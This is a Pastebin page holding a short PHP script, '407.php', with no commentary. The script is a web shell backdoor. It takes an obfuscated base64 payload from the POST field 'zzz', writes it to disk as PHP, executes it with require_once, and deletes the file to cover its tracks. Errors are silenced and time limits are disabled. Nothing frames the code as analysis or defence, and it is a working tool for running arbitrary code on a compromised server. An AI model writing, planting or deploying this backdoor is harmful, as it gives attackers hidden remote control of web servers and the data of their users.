Advertisement
PalmaSolutions

407.php

Sep 27th, 2018
181
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.27 KB | None | 0 0
  1. <?php
  2. error_reporting(E_ERROR);set_time_limit(0);
  3. if(isset($_POST['zzz'])){
  4.     $tofile='407.php';
  5.     $a =base64_decode(strtr($_POST['zzz'], '-_,', '+/='));
  6.     $a='<?php '.$a.'?>';
  7.     @file_put_contents($tofile,$a);
  8.     require_once('407.php');
  9.     @unlink($tofile);
  10.     exit;
  11.  
  12. }
  13. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement